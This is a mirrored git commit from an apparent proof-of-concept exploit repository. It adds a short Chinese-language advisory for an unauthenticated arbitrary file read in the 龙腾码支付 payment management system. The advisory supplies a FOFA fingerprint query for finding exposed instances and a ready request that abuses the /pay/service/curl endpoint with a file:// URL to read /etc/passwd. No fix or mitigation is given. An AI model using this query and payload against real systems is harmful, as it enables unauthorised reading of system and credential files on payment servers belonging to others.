mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-05 01:02:11 +00:00
Update 龙腾码支付payservicecurl任意文件读取.md
This commit is contained in:
parent
afc7e3f9df
commit
d90915b9f7
@ -1 +1,15 @@
|
||||
# 龙腾码支付payservicecurl任意文件读取
|
||||
|
||||
# 一、漏洞简介
|
||||
龙腾码支付管理系统存在未授权的任意文件读取漏洞
|
||||
|
||||
# 二、影响版本
|
||||
+ 龙腾码支付
|
||||
|
||||
# 三、资产测绘
|
||||
+ fofa`body="/epaydoc/epaydoc.php"`
|
||||
|
||||
# 四、漏洞复现
|
||||
```plain
|
||||
GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1
|
||||
```
|
||||
|
Loading…
x
Reference in New Issue
Block a user